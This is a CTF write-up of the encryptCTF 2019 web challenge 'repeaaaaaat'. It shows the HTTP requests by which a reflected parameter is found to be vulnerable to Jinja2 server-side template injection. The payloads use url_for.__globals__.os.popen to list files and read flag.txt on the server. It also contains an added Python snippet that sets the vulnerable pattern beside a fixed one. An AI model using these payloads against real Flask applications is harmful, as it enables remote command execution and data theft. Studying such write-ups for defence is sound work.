Tags: web ssti 

# ▼▼▼repeaaaaaat (Web: 150, 123/696 = 17.7%)▼▼▼

This writeup was written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

---

```
Can you repeaaaaaat?

http://104.154.106.182:5050

author: codacker
```

---

```
GET / HTTP/1.1
Host: 104.154.106.182:5050
```

```
HTTP/1.1 200 OK
Server: gunicorn/19.9.0
Date: Thu, 04 Apr 2019 14:02:15 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1243

<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>repeaaaaaat</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<script>
function repeat() {
for(var i=0; i<10; i++) {
lol = document.createElement("img")
lol.src = "/static/lol.png"
var shit = document.getElementById('shit')
shit.appendChild(lol)
}
}
</script>
</head>
<body onscroll=repeat()>
Hello,<div id="shit">














</div>

</body>
</html>
```

`Lz9zZWNyZXQ9ZmxhZw==`

↓ Base64 decode

`/?secret=flag`

---

## 【Try1: access /?secret=flag】

```
GET /?secret=flag HTTP/1.1
Host: 104.154.106.182:5050
```

```
HTTP/1.1 200 OK
Server: gunicorn/19.9.0
Date: Thu, 04 Apr 2019 14:05:09 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1247

<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>repeaaaaaat</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<script>
function repeat() {
for(var i=0; i<10; i++) {
lol = document.createElement("img")
lol.src = "/static/lol.png"
var shit = document.getElementById('shit')
shit.appendChild(lol)
}
}
</script>
</head>
<body onscroll=repeat()>
Hello,<div id="shit">














</div> flag

</body>
</html>
```

The string `flag` is reflected in the response!!

---

## 【Try2: SSTI(Server Side Template Injection)】

```
GET /?secret={{7*7}} HTTP/1.1
Host: 104.154.106.182:5050
```

`49`

An SSTI vulnerability exists!!
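
The server code is not shown in this writeup. As an added example (not the challenge's source), the sketch below assumes a Flask-style Jinja2 application and puts the coding pattern that produces the `49` above next to the fixed form, with a regression check a developer can run against either. The names `render_vulnerable`, `render_fixed` and `evaluates_input` are hypothetical.

```python
from jinja2 import Environment

# Assumption: a Jinja2 environment with autoescaping on, as a Flask-style
# app would use when rendering a template from a string.
env = Environment(autoescape=True)


def render_vulnerable(secret: str) -> str:
    # BAD: the request parameter is concatenated into the template *source*,
    # so Jinja2 compiles and evaluates any {{ ... }} it contains.
    return env.from_string("Hello, " + secret).render()


def render_fixed(secret: str) -> str:
    # GOOD: the template source is a constant; the parameter is passed as
    # data, so it is HTML-escaped and printed but never compiled.
    return env.from_string("Hello, {{ secret }}").render(secret=secret)


def evaluates_input(render) -> bool:
    """Regression check: does `render` evaluate template syntax in its input?

    Uses an arithmetic probe like the {{7*7}} request above, with constructed
    operands whose product is unlikely to appear in a page by chance.
    """
    a, b = 1337, 7331
    out = render("{{%d*%d}}" % (a, b))
    return str(a * b) in out


if __name__ == "__main__":
    for fn in (render_vulnerable, render_fixed):
        print(fn.__name__, "->", fn("{{7*7}}"),
              "| evaluates input:", evaluates_input(fn))
```
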

---

## 【Try3: Execute an arbitrary command using SSTI】

```
GET /?secret={{url_for.__globals__.os.popen('ls').read()}} HTTP/1.1
Host: 104.154.106.182:5050
```

```
flag.txt
requirements.txt
static
templates
```

---

## 【Try4: Read flag.txt using SSTI】

```
GET /?secret={{url_for.__globals__.os.popen('cat%20flag.txt').read()}} HTTP/1.1
Host: 104.154.106.182:5050
```

`encryptCTF{!nj3c7!0n5_4r3_b4D}`